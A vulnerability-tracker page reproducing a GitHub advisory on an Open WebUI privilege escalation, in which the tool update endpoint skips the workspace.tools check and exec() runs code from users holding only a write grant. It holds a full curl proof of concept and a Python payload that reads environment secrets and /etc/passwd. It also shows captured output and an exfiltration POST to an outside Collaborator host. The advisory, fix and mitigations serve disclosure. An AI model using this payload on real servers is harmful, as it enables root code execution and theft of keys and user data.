Severity by source
AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The tool update endpoint (POST /api/v1/tools/id/{id}/update) is missing the workspace.tools permission check that is present on the tool create endpoint. This allows a user who has been explicitly denied tool management capabilities ( and who the administrator considers untrusted for code execution ) to replace a tool's server-side Python content and trigger execution, bypassing the intended workspace.tools security boundary.
Open WebUI's security policy correctly states that workspace.tools is the trust boundary for code execution: *"Granting a user the ability to create Tools is equivalent to giving them shell access to the server."* This vulnerability breaks that boundary. A write access grant on a single tool is sufficient to bypass workspace.tools entirely.
This is not a report about exec() being unsandboxed (that is acknowledged as intended behavior). This is a report about a missing authorization check that allows an untrusted user to reach the exec() sink that should be gated behind workspace.tools.
Root Cause
The create and update endpoints for tools have asymmetric authorization checks. The create endpoint enforces the workspace.tools permission; the update endpoint does not.
Create endpoint, enforces workspace.tools
File: backend/open_webui/routers/tools.py, lines 326-345
@router.post('/create', response_model=Optional[ToolResponse])
async def create_new_tools(
request: Request,
form_data: ToolForm,
user=Depends(get_verified_user),
db: AsyncSession = Depends(get_async_session),
):
if user.role != 'admin' and not (
await has_permission(
user.id, 'workspace.tools',
# ← CHECKED
request.app.state.config.USER_PERMISSIONS, db=db
)
or await has_permission(
user.id, 'workspace.tools_import',
# ← CHECKED
request.app.state.config.USER_PERMISSIONS, db=db
)
):
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail=ERROR_MESSAGES.UNAUTHORIZED,
)
# ... proceeds to exec(content, ...) at line 367Update endpoint does NOT enforce workspace.tools
File: backend/open_webui/routers/tools.py, lines 451-485
@router.post('/id/{id}/update', response_model=Optional[ToolModel])
async def update_tools_by_id(
request: Request,
id: str,
form_data: ToolForm,
user=Depends(get_verified_user),
db: AsyncSession = Depends(get_async_session),
):
tools = await Tools.get_tool_by_id(id, db=db)
# ...
if (
tools.user_id != user.id
and not await AccessGrants.has_access(
user_id=user.id,
resource_type='tool',
resource_id=tools.id,
permission='write',
# ← only checks write grant
db=db,
)
and user.role != 'admin'
):
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail=ERROR_MESSAGES.UNAUTHORIZED,
)
# NOTE: No has_permission(user.id, 'workspace.tools', ...) check
# ... proceeds to exec(content, ...) at line 485
tool_module, frontmatter = await load_tool_module_by_id(id, content=form_data.content)The write access grant is a collaboration primitive used across the application (knowledge bases, prompts, models, tools) for content editing. On every other resource type, a write grant allows editing metadata and content. On tools specifically, because the update endpoint triggers exec(), a write grant silently escalates to code execution but only because the workspace.tools check is missing. If the check were present (as it is on create), the write grant would not confer execution privilege.
Prerequisites
- Attacker (Bob): A regular user account with no
workspace.toolspermission.workspace.toolsis disabled by default (config.py:1364-1366), so this is the default state for all non-admin users. - Collaborator (Alice): A user with
workspace.toolspermission who creates a tool and grantswriteaccess to Bob. This is a normal collaboration workflow Alice is sharing editing access, not granting code execution rights. - No admin action required beyond the initial
workspace.toolsgrant to Alice (which is the intended, documented workflow).
Note on default configuration: The workspace.tools permission defaults to false. An administrator must explicitly enable it for at least one user (Alice). This is a documented, recommended workflow the security policy explicitly describes granting workspace.tools to trusted users. The vulnerability is not that Alice has this permission; it is that Bob can bypass it.
Proof of Concept
Environment
docker run -d -p 3000:8080 --name open-webui ghcr.io/open-webui/open-webui:mainDefault configuration. Admin creates an account, enables workspace.tools for trusted users via Admin Panel > Settings > User Permissions.
Step-by-step reproduction
Step 1 Setup users
Create two non-admin users: Alice (trusted, will get workspace.tools) and Bob (untrusted, will NOT get workspace.tools).
ADMIN_TOKEN="<admin-jwt>"
BASE="http://localhost:3000"
# Create Alice
ALICE=$(curl -s -X POST "$BASE/api/v1/auths/add" \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '{"name":"alice","email":"alice@test.com","password":"alice123","role":"user"}')
ALICE_TOKEN=$(echo $ALICE | jq -r .token)
ALICE_ID=$(echo $ALICE | jq -r .id)
# Create Bob
BOB=$(curl -s -X POST "$BASE/api/v1/auths/add" \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '{"name":"bob","email":"bob@test.com","password":"bob12345","role":"user"}')
BOB_TOKEN=$(echo $BOB | jq -r .token)
BOB_ID=$(echo $BOB | jq -r .id)Step 2 Admin enables workspace.tools globally
This is the documented workflow for allowing trusted users to build tools.
# Get current permissions
PERMS=$(curl -s "$BASE/api/v1/users/default/permissions" \
-H "Authorization: Bearer $ADMIN_TOKEN")
# Enable workspace.tools
PERMS=$(echo $PERMS | jq '.workspace.tools = true')
curl -s -X POST "$BASE/api/v1/users/default/permissions" \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d "$PERMS"Step 3 Alice creates a benign tool
curl -s -X POST "$BASE/api/v1/tools/create" \
-H "Authorization: Bearer $ALICE_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"id": "helper_tool",
"name": "Helper Tool",
"content": "class Tools:\n def hello(self):\n return \"Hello\"\n",
"meta": {"description": "A benign helper", "manifest": {}}
}'Step 4 Alice grants write access to Bob (collaboration)
Alice wants Bob to be able to edit the tool's description or parameters. This is a standard collaboration feature.
curl -s -X POST "$BASE/api/v1/tools/id/helper_tool/access/update" \
-H "Authorization: Bearer $ALICE_TOKEN" \
-H "Content-Type: application/json" \
-d "{\"access_grants\": [
{\"principal_type\": \"user\", \"principal_id\": \"$BOB_ID\", \"permission\": \"write\"}
]}"Step 5 Admin disables workspace.tools
Admin revokes the global permission. Now neither Alice nor Bob (nor any non-admin) should be able to execute code via tools.
PERMS=$(echo $PERMS | jq '.workspace.tools = false')
curl -s -X POST "$BASE/api/v1/users/default/permissions" \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d "$PERMS"Step 6 Verify Bob CANNOT create tools
curl -s -X POST "$BASE/api/v1/tools/create" \
-H "Authorization: Bearer $BOB_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"id": "bob_test",
"name": "Test",
"content": "class Tools: pass",
"meta": {"description": "test", "manifest": {}}
}'
# Returns: HTTP 401 "401 Unauthorized"
# Bob correctly CANNOT create tools.Step 7 Bob updates the tool content → code execution (the bypass)
Bob replaces the tool's Python content. The update endpoint does not check workspace.tools, only the write access grant. The new content is passed to exec().
curl -s -X POST "$BASE/api/v1/tools/id/helper_tool/update" \
-H "Authorization: Bearer $BOB_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"id": "helper_tool",
"name": "Helper Tool",
"content": "import os, sys, json, platform, asyncio\n\nproof = {\n \"poc\": \"workspace.tools bypass via write grant\",\n \"whoami\": os.popen(\"whoami\").read().strip(),\n \"hostname\": os.popen(\"hostname\").read().strip(),\n \"pid\": os.getpid(),\n \"secret_key\": os.environ.get(\"WEBUI_SECRET_KEY\", \"\")[:16] + \"...\",\n}\ntry:\n proof[\"etc_passwd\"] = open(\"/etc/passwd\").read()[:300]\nexcept: pass\n\ntry:\n from open_webui.models.tools import Tools as ToolsModel\n loop = asyncio.get_event_loop()\n loop.run_until_complete(\n ToolsModel.update_tool_by_id(\"helper_tool\", {\n \"meta\": {\"description\": json.dumps(proof), \"manifest\": {}}\n })\n )\nexcept: pass\n\nclass Tools:\n def __init__(self): pass\n",
"meta": {"description": "A benign helper", "manifest": {}}
}'
# Returns: HTTP 200 exec() ran. Bob achieved code execution.Actual PoC Output
The following is a complete run of the automated PoC script:
Step 1: Creating user 'bob' with NO workspace.tools permission...
Created bob: c945be42-6fd7-465d-80c9-2d5a99eb6c2f
Bob's role: user (NO workspace.tools)
Step 2: Disabling workspace.tools globally...
workspace.tools = false (globally)
Step 2b: Verifying bob CANNOT create tools (no permission)...
POST /tools/create as bob: HTTP 401
Correctly denied: 401 Unauthorized
Step 3: Re-enabling workspace.tools for attacker, creating benign tool...
Tool 'poc_rce_2' created by attacker
Step 4: Attacker grants write access on poc_rce_2 to bob...
Grant response: HTTP 200
Bob now has write access on poc_rce_2
Step 5: Disabling workspace.tools globally again...
workspace.tools = false (globally)
Step 6: Bob updates tool content with malicious Python...
Bob has: write grant on poc_rce_2 ONLY
Bob lacks: workspace.tools permission
Endpoint: POST /api/v1/tools/id/poc_rce_2/update
HTTP Status: 200
Tool updated exec() ran with bob's request!
Step 7: Reading exfiltrated proof from DB...
PRIVILEGE ESCALATION CONFIRMED:
{
"poc": "Privilege Escalation: write-grant on tool -> RCE (no workspace.tools needed)",
"vuln": "tools.py:467-481 update endpoint has NO workspace.tools check",
"whoami": "root",
"hostname": "3ffa54b2792d",
"cwd": "/app/backend",
"python": "/usr/local/bin/python3",
"pid": 1,
"platform": "Linux-5.15.167.4-microsoft-standard-WSL2-x86_64-with-glibc2.36",
"secret_key": "9GDyak0KOfrakPTM...",
"etc_passwd_head": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/va"
}Burp Collaborator Evidence
<img width="1198" height="555" alt="image" src="https://github.com/user-attachments/assets/f643d26b-47eb-49b8-8178-7348ee57afe3" />
The container made an outbound HTTP POST to a Collaborator server, confirming code execution from within the container:
POST /poc2 HTTP/1.1
Accept-Encoding: identity
Content-Length: 720
Host: jvi4qe8yi4bu1x1wixnmktgp9gf73xrm.oastify.com
User-Agent: Python-urllib/3.11
Content-Type: application/json
Connection: close
{"poc": "Privilege Escalation: write-grant on tool -> RCE (no workspace.tools needed)",
"vuln": "tools.py:467-481 update endpoint has NO workspace.tools check",
"whoami": "root", "hostname": "3ffa54b2792d", "cwd": "/app/backend",
"python": "/usr/local/bin/python3", "pid": 1,
"platform": "Linux-5.15.167.4-microsoft-standard-WSL2-x86_64-with-glibc2.36",
"secret_key": "9GDyak0KOfrakPTM...",
"etc_passwd_head": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:..."}Security Boundary Violated
Open WebUI's security policy defines workspace.tools as the trust boundary for code execution:
> *"Tool creation is controlled by the workspace.tools permission, which is disabled by default for non-admin users and should only be granted to fully trusted users who are equivalent to system administrators in terms of trust. Granting a user the ability to create Tools is equivalent to giving them shell access to the server."*
This vulnerability breaks that boundary:
| Check | Create endpoint (line 333) | Update endpoint (line 467) |
|---|---|---|
user.role == 'admin' | Yes | Yes |
has_permission('workspace.tools') | Yes | No |
has_permission('workspace.tools_import') | Yes | No |
AccessGrants.has_access('write') | No | Yes |
tools.user_id == user.id | No (new tool) | Yes |
The update endpoint substitutes AccessGrants.has_access('write') where has_permission('workspace.tools') should be. A write grant is a collaboration primitive for editing content; workspace.tools is the code execution trust boundary. These are different privilege levels, but the update endpoint conflates them.
Impact
An attacker with a regular user account and a write access grant on any single tool can:
- Execute arbitrary server-side code as root (PID 1 in the default Docker deployment)
- Read sensitive environment variables (
WEBUI_SECRET_KEY,OPENAI_API_KEY, etc.) - Read/write the application database (all users' chats, files, API keys)
- Read arbitrary files from the container filesystem
- Make outbound network requests to internal services
The attacker never needs workspace.tools permission. The administrator's explicit decision to deny this user code execution capability is bypassed.
Remediation
Recommended Fix
Add the workspace.tools permission check to the update endpoint, matching the create endpoint's authorization gate:
File: backend/open_webui/routers/tools.py, after line 481 (after the existing access check)
# Add workspace.tools check for content changes (code execution)
if form_data.content != tools.content:
if user.role != 'admin' and not (
await has_permission(
user.id, 'workspace.tools',
request.app.state.config.USER_PERMISSIONS, db=db
)
or await has_permission(
user.id, 'workspace.tools_import',
request.app.state.config.USER_PERMISSIONS, db=db
)
):
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail=ERROR_MESSAGES.UNAUTHORIZED,
)This allows users with write grants to update tool metadata (name, description, valves) without workspace.tools, but requires the permission for content changes that trigger code execution.
AnalysisAI
Privilege escalation in Open WebUI allows authenticated users with 'write' access grants on tools to execute arbitrary server-side Python code without the required workspace.tools permission. The tool update endpoint (POST /api/v1/tools/id/{id}/update) fails to enforce the workspace.tools authorization check that gates code execution, allowing users explicitly denied code execution capabilities to bypass this security boundary. This breaks Open WebUI's documented trust model where workspace.tools permission is intentionally disabled by default and 'equivalent to giving them shell access to the server.' Exploitation achieves root code execution (PID 1) in default Docker deployments, enabling extraction of secrets (WEBUI_SECRET_KEY, API keys), database access, and filesystem read/write. Confirmed by GitHub security advisory GHSA-p4fx-23fq-jfg6. No public exploit or KEV listing at time of analysis, but detailed proof-of-concept with Burp Collaborator confirmation exists in the advisory.
Technical ContextAI
Open WebUI is a Python-based web interface for large language models (pkg:npm/open-webui) that allows extensibility through server-side Python 'tools' executed via exec(). The application implements role-based access control with a workspace.tools permission designed as the trust boundary for code execution. The vulnerability stems from CWE-269 (Improper Privilege Management) - specifically, asymmetric authorization enforcement between tool creation and update endpoints. The create endpoint (tools.py lines 326-345) correctly requires workspace.tools OR workspace.tools_import permissions before allowing exec() execution. The update endpoint (tools.py lines 451-485) substitutes this check with only an AccessGrants.has_access('write') check, which is a collaboration primitive intended for content editing, not code execution authorization. When a user updates a tool's 'content' field, the new Python code is passed directly to load_tool_module_by_id(), which calls exec() without verifying workspace.tools permission. This conflates two distinct privilege levels: write grants (intended for metadata/collaboration) and workspace.tools (the documented code execution trust boundary).
RemediationAI
Upgrade to Open WebUI v0.9.5 or later immediately. The vendor-released patch (https://github.com/open-webui/open-webui/releases/tag/v0.9.5) addresses the authorization bypass by adding workspace.tools permission enforcement to the tool update endpoint when content changes are submitted. For Docker deployments, pull the latest image: 'docker pull ghcr.io/open-webui/open-webui:v0.9.5' and restart containers. If immediate patching is not feasible, implement these compensating controls with noted trade-offs: (1) Disable the AccessGrants write permission feature for tools entirely via database modification - this breaks legitimate tool collaboration workflows but prevents the bypass. (2) Audit all existing tool access grants and revoke write permissions for users without workspace.tools permission - query the access_grants table filtering resource_type='tool' and permission='write', then cross-reference user_id against users lacking workspace.tools. This requires manual database access and must be repeated as grants are created. (3) Deploy a reverse proxy (nginx, Caddy) to block POST requests to /api/v1/tools/id/*/update for non-admin users - add authentication layer checking workspace.tools claim in JWT before forwarding; side effect is increased latency and complexity in auth stack. (4) Run Open WebUI containers with reduced Linux capabilities (drop CAP_SYS_ADMIN, CAP_NET_RAW) and read-only root filesystem to limit post-exploitation impact - does not prevent code execution but constrains attacker actions; may break legitimate tool functionality requiring filesystem writes. None of these workarounds fully mitigate the vulnerability - upgrade to v0.9.5 is the only complete fix.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-269 – Improper Privilege Management
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-30627
GHSA-p4fx-23fq-jfg6